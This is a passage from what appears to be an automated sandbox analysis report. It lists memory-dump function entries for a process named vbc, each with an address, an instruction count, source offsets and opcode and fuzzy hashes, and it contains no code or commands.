                                                          • Source File: 00000005.00000002.578801743.000000000A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_a8f0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 26a1b6bd54d15250129c1c826232368a7c2132c1c78459a318e89a3d105caae7
                                                          • Instruction ID: 171ccc5e863487f775b8bd49b32d2c5d212523133cbd844cdbea1f195d689d71
                                                          • Opcode Fuzzy Hash: 26a1b6bd54d15250129c1c826232368a7c2132c1c78459a318e89a3d105caae7
                                                          • Instruction Fuzzy Hash: 33112B316183468ECB11EF7998440E9BB75BFE224070B4B67CA45DB112FB30C648C761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055BD49F Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.571394736.00000000055BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 055BD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_55bd000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 91de69749803262f64f7b8b8b4bccd256ba561acb339f86e5f4f1191904c0145
                                                          • Instruction ID: c18b862c218a3540122a9b77610e37316cad199c7743cccc2319e2a0c2aadc96
                                                          • Opcode Fuzzy Hash: 91de69749803262f64f7b8b8b4bccd256ba561acb339f86e5f4f1191904c0145
                                                          • Instruction Fuzzy Hash: A511D075504280CFDB01CF14C5C8B65BF72FB84318F24C6A9D8494B696C37AD54ACB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055BD2EF Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.571394736.00000000055BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 055BD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_55bd000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 55393958954109a3e396a3efa1e5245f1f1eaa3d036de76736f23839facf16c0
                                                          • Instruction ID: 14f5423a867eb3e035f0382d16e02f80360fac911af259792da29de1290ff63c
                                                          • Opcode Fuzzy Hash: 55393958954109a3e396a3efa1e5245f1f1eaa3d036de76736f23839facf16c0
                                                          • Instruction Fuzzy Hash: CA11C176504280CFDB11CF14D5C8B69FF72FB84324F28C6AAD8494B646C37AD44ACBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF13C0 Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 889db35974392c995dcfb81372ac85ed3d18eacf5a5ae713ed1e88b3a5019a9d
                                                          • Instruction ID: 3f3015424c90f8bb4a6175e6e36507fd0bd456c31621e58ea53168e7021b499d
                                                          • Opcode Fuzzy Hash: 889db35974392c995dcfb81372ac85ed3d18eacf5a5ae713ed1e88b3a5019a9d
                                                          • Instruction Fuzzy Hash: 7C119E316007048BC714EF68E4909DEB3EABFD4228B508E7CD5464B6A5EB70BE4A87D0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF2A7E Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8e9890e4d99ba4bcb61fc4d44d2993db9f090b99eefe19fcef83567932b9ec29
                                                          • Instruction ID: f95ffee93497ce9ba412ef06d9f3fae9dd72ee950c18879f6dad84c8e1c9c9fe
                                                          • Opcode Fuzzy Hash: 8e9890e4d99ba4bcb61fc4d44d2993db9f090b99eefe19fcef83567932b9ec29
                                                          • Instruction Fuzzy Hash: BC110A35E041598FDB18CB98C498AEDBBF1AF4C320F1584A9E405F7361DB759D45CAA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFFEF8 Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bb5f612c16f6a030c57dbaede1a32c4495b2ca4eed99c4b5b3fade298ffb572c
                                                          • Instruction ID: 9967e4c8c05020f1701a356cd7bf220e780d0b9c6c0fc591f173a6a30dab0003
                                                          • Opcode Fuzzy Hash: bb5f612c16f6a030c57dbaede1a32c4495b2ca4eed99c4b5b3fade298ffb572c
                                                          • Instruction Fuzzy Hash: 56118E30B0414A9FCB50DFB8D4606DEBBF5EB84228B1149B9C519D7251DB74AA0B8BE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055ADAA5 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.571346305.00000000055AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 055AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_55ad000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2ece38e0d0398749a70b15c6800e3dbb54386adbfb8f449af85a680a80727580
                                                          • Instruction ID: 869809e755dfbf9aa541c9962d77da4646fbe29cdf84d1657a4b9f711725c5b1
                                                          • Opcode Fuzzy Hash: 2ece38e0d0398749a70b15c6800e3dbb54386adbfb8f449af85a680a80727580
                                                          • Instruction Fuzzy Hash: CA01F77200C344DAE7109A51CCC4BABFBECFF41274F0C885AED090BA86C3799844CAB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFB989 Relevance: .0, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2405319fcc405bec04bd9a7f12d93cb0ce8d046653de3ffac015d7f47fbffb88
                                                          • Instruction ID: fcf55d18e88891238c790c8b9d5cfdb831ffc357cfe430e78a3c5e8e38e801f9
                                                          • Opcode Fuzzy Hash: 2405319fcc405bec04bd9a7f12d93cb0ce8d046653de3ffac015d7f47fbffb88
                                                          • Instruction Fuzzy Hash: 0501AD70D04229DBDF20DBA4D91A3BDB7B1EB84725F018859D119A2360EB74454ADFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFFF08 Relevance: .0, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: efa2d42f6e740b4ea2b938362257e451126df366d0c9cdab6f646d5c62aa09fa
                                                          • Instruction ID: 4ca86cede689be0c85e11654140de957da36beb1f1602aa200bcfed844e4ea7a
                                                          • Opcode Fuzzy Hash: efa2d42f6e740b4ea2b938362257e451126df366d0c9cdab6f646d5c62aa09fa
                                                          • Instruction Fuzzy Hash: 95015231B001499FCB50DFACD4506DEB7E5EB84218F114969D119D7251DB70AA0A8BD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFB990 Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 57f2fd089ff7ae23587fb704d4b9672f280254392fefa5eb543cb5e71f6b9927
                                                          • Instruction ID: 2876b5a8d8c9b031890fe2921c47d094defd760bbbd2cc27018471ea526cccbe
                                                          • Opcode Fuzzy Hash: 57f2fd089ff7ae23587fb704d4b9672f280254392fefa5eb543cb5e71f6b9927
                                                          • Instruction Fuzzy Hash: BC01BC70D0021EDBDF20DFA5D8157FEB7B1EB84724F008969D118A2390EB780649CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF76B1 Relevance: .0, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 90ff6bac5b24ba384cf52012517aa75ec23d205aeab32d772c4b9e3bc5e90d85
                                                          • Instruction ID: 48253310d6f5b3230b9d17fd690767c799611d64e0feef481783c38091448762
                                                          • Opcode Fuzzy Hash: 90ff6bac5b24ba384cf52012517aa75ec23d205aeab32d772c4b9e3bc5e90d85
                                                          • Instruction Fuzzy Hash: 99014F316107048FCB64DE64E885A9AB7E6FFC0368B544DADD4498B911CB71B84ACB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFCD70 Relevance: .0, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 90b66607cb0de127ec312b01dd95bea4ac65924b92ddf5c401f058e24d9dd4dd
                                                          • Instruction ID: b065500ee31e1637671577d3c72dbaeb6c523d2f9d63341c61de52ee20fbad31
                                                          • Opcode Fuzzy Hash: 90b66607cb0de127ec312b01dd95bea4ac65924b92ddf5c401f058e24d9dd4dd
                                                          • Instruction Fuzzy Hash: 7E0184B0A0420D9BD710DFA9D42976EBFF1EB41718F0044AAD18997782DF740589DBD2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055ADAA4 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.571346305.00000000055AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 055AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_55ad000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40b79608fcd9c2eadbcf4836fb6b58215a5eafcece36d93677e87f71aa716a94
                                                          • Instruction ID: 60ed598b387c146dc43e0b0c4b0dfe23946efc6214a6dc616f02bc5a14ba3998
                                                          • Opcode Fuzzy Hash: 40b79608fcd9c2eadbcf4836fb6b58215a5eafcece36d93677e87f71aa716a94
                                                          • Instruction Fuzzy Hash: 33F09672408348AEEB108E15CCC4B66FFE8FB42674F18C45AED085F686C3799844CEB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF8768 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cbaeaf877b1c572b2e2787648600ecb22dbe85f74d46f384faae01b94eacb7cd
                                                          • Instruction ID: 0a5d705acb80facc23cee8b7ddfc959318437011213417c4e526a66d5d31d48c
                                                          • Opcode Fuzzy Hash: cbaeaf877b1c572b2e2787648600ecb22dbe85f74d46f384faae01b94eacb7cd
                                                          • Instruction Fuzzy Hash: FAF0A072B080204FA7049A9D5C90A6A9BDFDFC917571980AAE00CCB391EA618C0243A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF8778 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a2cf4c1c49b4911ebf92492fce43a83cee099dd35571a4445db62188d8314e7
                                                          • Instruction ID: 8d7481d59c414d477673a0356a2480defbddc87977cb59f65c0ac8211f71913f
                                                          • Opcode Fuzzy Hash: 2a2cf4c1c49b4911ebf92492fce43a83cee099dd35571a4445db62188d8314e7
                                                          • Instruction Fuzzy Hash: 8EE09A727041245B1B08AADEAC90E6FABDFDBC9178314806AE40DCB380EE61DC0243A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF2B20 Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6179abb2f50a8a91e31451bc3dae01f03d18f174f3460310a8afd978088401c9
                                                          • Instruction ID: 459773cdfacd0201c279a2d1bf455c359b24cd779405c1a5bed6e556ee58a5eb
                                                          • Opcode Fuzzy Hash: 6179abb2f50a8a91e31451bc3dae01f03d18f174f3460310a8afd978088401c9
                                                          • Instruction Fuzzy Hash: 12E0E5727006508FCB28CE099894A6ABBADEBC5320B1980BEF909C3251D6258C06C650
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF87C2 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25af6e32423867e8eb5ebaab36d70085cacb9fc59b1d64552666a668ce5ac075
                                                          • Instruction ID: 0c590257bb9514a264a1e5e8d57b8ad3badb5e37483bc08c528559b7cf21316e
                                                          • Opcode Fuzzy Hash: 25af6e32423867e8eb5ebaab36d70085cacb9fc59b1d64552666a668ce5ac075
                                                          • Instruction Fuzzy Hash: 75F0A07AB042849FC714CA19D414E9ABFE9DBD8260B0580AAF809C3341DA309C02CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF6075 Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30ef3259028ae03122e6dbb31f9f6b6d63bc55ac55bddae27bd67a268430e02f
                                                          • Instruction ID: 895db7b6c185e459b0d49c9a142c67ff4cb8ca07e7b5add37484acd28e331b95
                                                          • Opcode Fuzzy Hash: 30ef3259028ae03122e6dbb31f9f6b6d63bc55ac55bddae27bd67a268430e02f
                                                          • Instruction Fuzzy Hash: 5FF0F436A01108DFCB41CF94D5849CCBBF2FB88221B21C690E518AB225C332EE66DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF87D0 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 92ce98093a0d768cd81a2334f7f7f95d464c790a90e2d1e364f8107e1d67c81e
                                                          • Instruction ID: 58ddddf34aee65558fe5647d209ff521f1b7df1c8eae2cb522d52e174271f388
                                                          • Opcode Fuzzy Hash: 92ce98093a0d768cd81a2334f7f7f95d464c790a90e2d1e364f8107e1d67c81e
                                                          • Instruction Fuzzy Hash: 85E04F7A700248AB4754DA4ED414E9BBBEDDBC82B0715C0AAF90DC7301DB31EC028BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFB937 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 562dd1236cc8733d14463fdd18c2f6d08aacc58cadabe13fb5ce34a9aad8ff6b
                                                          • Instruction ID: fdbb6048d1312d8a611cc9accca6021a85051d391c49aa7ecf7e177784f25b5f
                                                          • Opcode Fuzzy Hash: 562dd1236cc8733d14463fdd18c2f6d08aacc58cadabe13fb5ce34a9aad8ff6b
                                                          • Instruction Fuzzy Hash: E3E01A31A50310DFC7392BB4E81A1A93FB4FF9522130540ABF907C6311EB794801CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFD0D5 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f0d12694c527a80107a75847b7494aadfa761f782712de1a930aba7617c7a482
                                                          • Instruction ID: 936b85cf8d50166554f4479acafd0c48899b82481b7ba5db753b427dd0207bd4
                                                          • Opcode Fuzzy Hash: f0d12694c527a80107a75847b7494aadfa761f782712de1a930aba7617c7a482
                                                          • Instruction Fuzzy Hash: 02E0DF30601A108BCB0A7F28E42A0AD7F71FFC6211300412EE80787740EF308A46CBC7
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFD0D8 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70b35127ccc45da0ba42ae7f54dc2faff2f3905ef1947f913df3c24ff3f2d4bb
                                                          • Instruction ID: 79e20d6e8a4a0282e6f58c170a251173fef334b9389766eaf74799d2bd923478
                                                          • Opcode Fuzzy Hash: 70b35127ccc45da0ba42ae7f54dc2faff2f3905ef1947f913df3c24ff3f2d4bb
                                                          • Instruction Fuzzy Hash: 51E04F31611A149B8B197B68E4295AD7BA5FFC5611700412EE84693640EF309A468BD6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFB948 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cbe3c60ca61b8f1d0f31dd8c485cf8e3eb973d723c2c7851adf689c2b5a18645
                                                          • Instruction ID: 3d23aa1f94da92c921b6a1b0fa01af76e6a42c0320140f8f9abfba3bbc237679
                                                          • Opcode Fuzzy Hash: cbe3c60ca61b8f1d0f31dd8c485cf8e3eb973d723c2c7851adf689c2b5a18645
                                                          • Instruction Fuzzy Hash: 97D01731310224DB9B382BB9F4191A93B68FB8467634504ABFA0EC2700DF7A8800DA91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFB850 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 54e34289eddff136da512d63e15a90a729f414fc62675b54c04c827b8457854a
                                                          • Instruction ID: 2254a46a7449807c470fb80899a5a771ca779503a837cef84741cbbe7eb1b970
                                                          • Opcode Fuzzy Hash: 54e34289eddff136da512d63e15a90a729f414fc62675b54c04c827b8457854a
                                                          • Instruction Fuzzy Hash: 3ED0A72814E3845FCB4157B1EC553853F54EB42211B0540E2F109C7662DAA884018A31
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFD52C Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9043f00224dd9f1c4195f7e12921eb92fd6654bccdf861e2148847ecd690907c
                                                          • Instruction ID: f7fd6416ada738c0a4f61316952c79ed18788b897b7cf100b77fab20086c3c4f
                                                          • Opcode Fuzzy Hash: 9043f00224dd9f1c4195f7e12921eb92fd6654bccdf861e2148847ecd690907c
                                                          • Instruction Fuzzy Hash: FFD05E31A10569AB8B057B68E0160DCBB74FF57211B00421AE50A97250EF648A8787D7
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFDE54 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6ddab14c69dd04050c2161fa49c41e09c9a88715cc6f8938d511a89c4aff5da6
                                                          • Instruction ID: 753b377a159eb5bda80718455eb709af0797aea6dfa30c38a9868c6ab8f0b268
                                                          • Opcode Fuzzy Hash: 6ddab14c69dd04050c2161fa49c41e09c9a88715cc6f8938d511a89c4aff5da6
                                                          • Instruction Fuzzy Hash: B3D0A7311013058FEB690F3190513747F64ABA1219F5040DDE52E891D2DB77C4C7C700
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFD530 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6039b0f6ee519e7cabdce5148b5c4207e02784b7adf33df64001a1f59ae71066
                                                          • Instruction ID: 1940158bcba64664b3a97c4624b341627efcde70a72c4c1673b9e622e939384a
                                                          • Opcode Fuzzy Hash: 6039b0f6ee519e7cabdce5148b5c4207e02784b7adf33df64001a1f59ae71066
                                                          • Instruction Fuzzy Hash: 6DD0A731A10559AB87007A68E4044DCBB68FB47211700421BE40A93140EF60994687DB
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFDA70 Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d166b90cb7db16fd52db0025bc56ae387584031bc3698f95c2aded549984686
                                                          • Instruction ID: aecfcaf216144c03fd7d1bc3a9970c17ebc76e7897f60e6a6e7371af792a4001
                                                          • Opcode Fuzzy Hash: 0d166b90cb7db16fd52db0025bc56ae387584031bc3698f95c2aded549984686
                                                          • Instruction Fuzzy Hash: 70D05E32954A88CFCB01EFB4D4194ACBF70BF67304B0481AFD8899B161FA614569DB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFDE58 Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4dbb9a24292387aa75d3a65b7d8e3e9b6379ea357b6e44bef69b9eb5de243e92
                                                          • Instruction ID: eb40054e28430fc57f349152cb2520b4eeb1c56b6b10cc7d6904d37abf94c549
                                                          • Opcode Fuzzy Hash: 4dbb9a24292387aa75d3a65b7d8e3e9b6379ea357b6e44bef69b9eb5de243e92
                                                          • Instruction Fuzzy Hash: 19D0223220130A8FEF680B3290513347B98ABA122AF9040EDE60E882C2DB37C487C300
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFAE7F Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4de827002fe1233c1441b2c99b3d951c379792a9a30f8ebd9cf7d27ac76c10ee
                                                          • Instruction ID: a47d3bb34baa2699ad8c5eb315283c55d7e19a563acb754cf9e0107500bc3c2e
                                                          • Opcode Fuzzy Hash: 4de827002fe1233c1441b2c99b3d951c379792a9a30f8ebd9cf7d27ac76c10ee
                                                          • Instruction Fuzzy Hash: 59C08CA2E040E68BEB110511AA3D3AA39918BE4A09F0B04E2908C67386E8694E8745E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFB860 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
